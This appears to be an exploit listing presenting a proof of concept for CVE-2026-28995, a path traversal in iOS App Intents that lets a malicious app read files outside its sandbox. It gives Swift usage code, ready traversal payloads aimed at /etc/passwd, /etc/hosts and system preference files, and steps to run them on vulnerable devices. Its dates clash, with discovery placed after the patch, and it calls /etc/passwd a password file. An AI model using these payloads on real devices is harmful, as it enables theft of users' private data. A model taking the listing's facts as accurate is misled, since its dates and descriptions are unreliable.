Share
## https://sploitus.com/exploit?id=5E384957-8285-5247-95CE-C7384C91A926
# CVE-2026-28995

**Proof of Concept for CVE-2026-28995** โ€” Path Traversal vulnerability in App Intents on iOS 26.4.2 and below.

## Description

This vulnerability allows a malicious app to **read any file** outside its sandbox via App Intents. The root cause is insufficient path validation in Apple's App Intents framework.

**Affected versions:** iOS 26.4.2 and below  
**Patched in:** iOS 26.5 (May 11, 2026)

## Usage

### 1. Function `readCve(path: String) -> String`

```swift
let intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
```
2. Path Examples

Path	Reads
../../../../../../../../../../../../../etc/passwd	User passwords
../../../../../../../../../../../../../etc/hosts	Hosts file
../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist	System preferences
3. Directory Handling

If the path points to a directory, the function returns:


[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/
How to Run

Create an iOS project in Xcode.
Add CVE-2026-28995.swift to the project.
Call readCve(path:) with the target path.
Run on iOS 26.4.2 or earlier.
Responsible Disclosure

Discovered: July 1, 2026
Patched in: iOS 26.5 (May 11, 2026)